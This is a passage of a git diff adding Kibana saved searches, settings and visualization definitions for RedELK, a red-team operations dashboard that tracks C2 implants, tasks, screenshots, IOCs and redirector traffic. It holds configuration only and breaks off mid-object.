"{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"negate\":false,\"disabled\":false,\"alias\":null,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"ioc\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match\":{\"c2.log.type\":{\"query\":\"ioc\",\"type\":\"phrase\"}}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 IOCs", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 220], "type": "search", "version": "1"} +{"attributes": {"columns": ["module.name", "module.type", "module.last_run.timestamp", "module.last_run.status", "module.last_run.count", "module.last_run.message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"exists\",\"key\":\"module.name\",\"value\":\"exists\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"exists\":{\"field\":\"module.name\"},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - Modules status", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "654f76a0-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "b5972620-2b72-11eb-85d7-bbc5b6917d13", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 223], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "redir.backend.name", "source.ip", "source.domain", "source.geo.as.organization.name", "source.geo.country_iso_code", "http.request.body.content"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"tags:alarm_*\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - Redirector Traffic - Alarmed", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 225], "type": "search", "version": "1"} +{"attributes": {"columns": ["implant.id", "infra.attack_scenario", "host.name", "user.name", "host.ip_int", "host.ip_ext", "implant.arch", "host.os.name", "host.os.version", "host.os.kernel", "implant.parent_id", "host.geo.as.organization.name", "host.geo.country_iso_code"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 implants overview", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "implantsdb", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 227], "type": "search", "version": "1"} +{"attributes": {"columns": ["iplist.name", "iplist.source", "iplist.ip"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [], "title": "RedELK - IP Lists", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "87530b40-9269-11eb-a753-9da683898c26", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "789bb360-2ab1-11eb-bc47-53169c986c81", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 229], "type": "search", "version": "1"} +{"attributes": {"columns": ["bluechecktype", "message"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\n \"highlightAll\": true,\n \"version\": true,\n \"query\": {\n \"language\": \"kuery\",\n \"query\": \"\"\n },\n \"indexRefName\": \"kibanaSavedObjectMeta.searchSourceJSON.index\",\n \"filter\": []\n}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - BlueCheck", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "a4757c90-ce50-11ea-a580-918d4757c08d", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "bluecheck", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1643015939090, 281], "type": "search", "version": "1"} +{"attributes": {"columns": ["attackscenario", "from", "to", "subject", "emailfolder"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "sort": [], "title": "RedELK - Emails", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "c1fca0d0-d171-11ea-8ac3-bfcfabda2250", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "email", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171874859, 231], "type": "search", "version": "1"} +{"attributes": {"columns": ["user.name", "host.name", "c2.message", "threat.technique.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"implant_task\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_task\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - C2 Tasks", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "cc523820-d021-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 234], "type": "search", "version": "1"} +{"attributes": {"columns": ["c2.message", "host.name", "user.name", "implant.id"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"event.module\",\"params\":{\"query\":\"redelk\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"event.module\":\"redelk\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "sort": [], "title": "RedELK - Signals", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 237], "type": "search", "version": "1"} +{"attributes": {"columns": ["infra.attack_scenario", "host.name", "user.name", "screenshot.full", "screenshot.thumb"], "description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"highlightAll\":true,\"version\":true,\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":false,\"disabled\":false,\"type\":\"phrase\",\"key\":\"c2.log.type\",\"params\":{\"query\":\"screenshots\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"screenshots\"}},\"$state\":{\"store\":\"appState\"}}],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "sort": [["@timestamp", "desc"]], "title": "RedELK - C2 Screenshots", "version": 1}, "coreMigrationVersion": "7.16.3", "id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "migrationVersion": {"search": "7.9.3"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171874859, 240], "type": "search", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json new file mode 100644 index 00000000..5b96d205 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_settings.json @@ -0,0 +1,13 @@ +{ + "changes": { + "theme:darkMode": true, + "telemetry:optIn": false, + "siem:enableNewsFeed": false, + "siem:defaultIndex": ["apm-*-transaction*","auditbeat-*","endgame-*","filebeat-*","packetbeat-*","winlogbeat-*","rtops-*","redirtraffic-*"], + "defaultIndex": "195a3f00-d04f-11ea-9301-a30a04251ae9", + "defaultRoute": "/app/discover#/view/1c580960-b6a9-11e8-bc1a-cf8fa3255855", + "shortDots:enable": false, + "telemetry:enabled": false, + "timepicker:timeDefaults": "{\"from\": \"now-7d\",\"to\": \"now\"}" + } +} diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson new file mode 100644 index 00000000..5eb99f7c --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_visualization.ndjson @@ -0,0 +1,47 @@ +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-12M\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Type\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - IOC over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "057076f0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 99], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Screenshots\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Screenshots\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Screenshots over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "0b5ffcd0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 101], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links internal", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Dashboard links internal\",\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**Dashboards** : [Summary](/app/dashboards#/view/02486040-d355-11ea-9301-a30a04251ae9) | [Alarms](/app/dashboards#/view/53b69200-d4e3-11ea-9301-a30a04251ae9) | [Traffic](/app/dashboards#/view/0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba) | [Implants](/app/dashboards#/view/117dbba0-c6f5-11e8-a9c6-cd307b96b1ba) | [Red Team Operations](/app/dashboards#/view/04b87c50-d028-11ea-9301-a30a04251ae9) | [Tasks](/app/dashboards#/view/0523c8a0-d025-11ea-9301-a30a04251ae9) | [Downloads](/app/dashboards#/view/643de010-d04c-11ea-9301-a30a04251ae9) | [Credentials](/app/dashboards#/view/82b865a0-d318-11ea-9301-a30a04251ae9) | [Screenshots](/app/dashboards#/view/a2dcebf0-d316-11ea-9301-a30a04251ae9) | [IOC](/app/dashboards#/view/86643e90-d4e4-11ea-9301-a30a04251ae9) | [TTP](/app/dashboards#/view/3ed7a630-d051-11ea-9301-a30a04251ae9) | [Health](/app/dashboards#/view/509e6a80-926a-11eb-a753-9da683898c26)\",\"openLinksInNewTab\":false}}"}, "coreMigrationVersion": "7.16.3", "id": "0f82b540-d237-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642171875895, 102], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top computers with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":17,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Hostname\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Username\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top computers with new implants\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 105], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"NOT (redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - Decoy", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - Decoy\"}"}, "coreMigrationVersion": "7.16.3", "id": "10dd40f0-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 107], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"(redir.backend.name: c2*)\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic - C2", "uiStateJSON": "{\"mapCenter\":[32.93684850365019,0.7170999376103283],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Yellow to Red\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"},\"tmsLayers\":[{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

\",\"id\":\"road_map\",\"maxZoom\":18,\"minZoom\":0,\"subdomains\":[],\"url\":\"https://tiles.maps.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana&my_app_version=6.4.0&license=2f28f176-767a-4df6-a815-1f17dd8e46fc\"}]}},\"title\":\"RedELK - Redirector Traffic - C2\"}"}, "coreMigrationVersion": "7.16.3", "id": "1d26da60-b983-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 109], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists metrics", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists metrics\",\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"IPs\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"group\"}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}}}"}, "coreMigrationVersion": "7.16.3", "id": "20fac240-926c-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642171875895, 111], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Techniques\"}"}, "coreMigrationVersion": "7.16.3", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 113], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", 